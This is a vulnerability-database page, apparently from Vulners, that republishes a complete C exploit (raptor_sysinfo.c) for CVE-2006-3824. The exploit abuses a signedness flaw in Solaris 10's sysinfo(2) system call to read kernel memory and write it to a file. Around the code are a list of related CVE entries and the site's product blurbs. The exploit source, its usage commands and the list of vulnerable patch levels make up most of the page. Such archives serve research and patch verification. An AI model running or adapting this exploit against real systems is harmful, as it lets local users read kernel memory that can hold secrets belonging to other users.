Vulners
Lucene search
sysinforaptor.txt
| Reporter | Title | Published | Views | Family All 12 |
|---|---|---|---|---|
 | Solaris 10 sysinfo(2) Local Kernel Memory Disclosure Exploit | 22 Aug 200600:00 | – | zdt |
 | CVE-2003-1062 | 8 Feb 200505:00 | – | cve |
| CVE-2006-3824 | 25 Jul 200600:00 | – | cve |
 | CVE-2003-1062 | 8 Feb 200505:00 | – | cvelist |
| CVE-2006-3824 | 25 Jul 200600:00 | – | cvelist |
 | EUVD-2003-1052 | 7 Oct 202500:30 | – | euvd |
| EUVD-2006-3818 | 7 Oct 202500:30 | – | euvd |
 | Solaris 10 sysinfo(2) - Local Kernel Memory Disclosure (2) | 22 Aug 200600:00 | – | exploitpack |
 | CVE-2003-1062 | 15 Oct 200304:00 | – | nvd |
| CVE-2006-3824 | 25 Jul 200613:22 | – | nvd |
10
`/*
* $Id: raptor_sysinfo.c,v 1.2 2006/08/22 13:47:54 raptor Exp $
*
* raptor_sysinfo.c - Solaris sysinfo(2) kernel memory leak
* Copyright (c) 2006 Marco Ivaldi <[email protected]>
*
* systeminfo.c for Sun Solaris allows local users to read kernel memory via
* a 0 variable count argument to the sysinfo system call, which causes a -1
* argument to be used by the copyout function. NOTE: this issue has been
* referred to as an integer overflow, but it is probably more like a
* signedness error or integer underflow (CVE-2006-3824).
*
* http://en.wikipedia.org/wiki/Pitagora_Suicchi
*
* Greets to prdelka, who also exploited this vulnerability.
*
* I should also definitely investigate the old sysinfo(2) vulnerability
* described in CVE-2003-1062, affecting Solaris/SPARC 2.6 through 9 and
* Solaris/x86 2.6 through 8... It may come in handy sooner or later;)
*
* Usage:
* $ gcc raptor_sysinfo.c -o raptor_sysinfo -Wall
* $ ./raptor_sysinfo kerndump 666666
* [...]
* $ ls -l kerndump
* -rwx------ 1 raptor other 666666 Aug 22 14:41 kerndump
*
* Vulnerable platforms (SPARC):
* Solaris 10 without patch 118833-09 [tested]
*
* Vulnerable platforms (x86):
* Solaris 10 without patch 118855-06 [untested]
*/
#include <errno.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <strings.h>
#include <unistd.h>
#include <sys/systeminfo.h>
#define INFO1 "raptor_sysinfo.c - Solaris sysinfo(2) kernel memory leak"
#define INFO2 "Copyright (c) 2006 Marco Ivaldi <[email protected]>"
#define BUFSIZE 536870911
int errno;
int main(int argc, char **argv)
{
int fd;
size_t out, bufsize = BUFSIZE;
char *buf;
/* print exploit information */
fprintf(stderr, "%s\n%s\n\n", INFO1, INFO2);
/* read command line */
if (argc < 2) {
fprintf(stderr, "usage: %s outfile [outsize]\n\n", argv[0]);
exit(1);
}
if (argc > 2)
if ((bufsize = atoi(argv[2])) == 0) {
fprintf(stderr, "Error (atoi): invalid outsize\n");
exit(1);
}
/* print some output */
fprintf(stderr, "Using outfile\t: %s\n", argv[1]);
fprintf(stderr, "Using outsize\t: %u\n\n", bufsize);
/* prepare the output buffer */
if ((buf = (char *)malloc(bufsize)) == NULL) {
perror("Error (malloc)");
fprintf(stderr, "Hint: Try again with a smaller output size\n");
exit(1);
}
memset(buf, 0, bufsize);
/* Pitagora Suicchi! */
sysinfo(SI_SYSNAME, buf, 0);
/* save output to outfile */
if ((fd = open(argv[1], O_RDWR | O_CREAT | O_TRUNC, 0700)) < 0) {
perror("Error (open)");
free(buf);
exit(1);
}
out = write(fd, buf, bufsize);
fprintf(stderr, "Pitagora Suicchi! %u bytes written to %s\n", out, argv[1]);
fprintf(stderr, "Hint: Try also with a bigger output size\n");
close(fd);
free(buf);
exit(0);
}
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
27 Aug 2006 00:00Current
6.6Medium risk
Vulners AI Score6.6
EPSS0.00256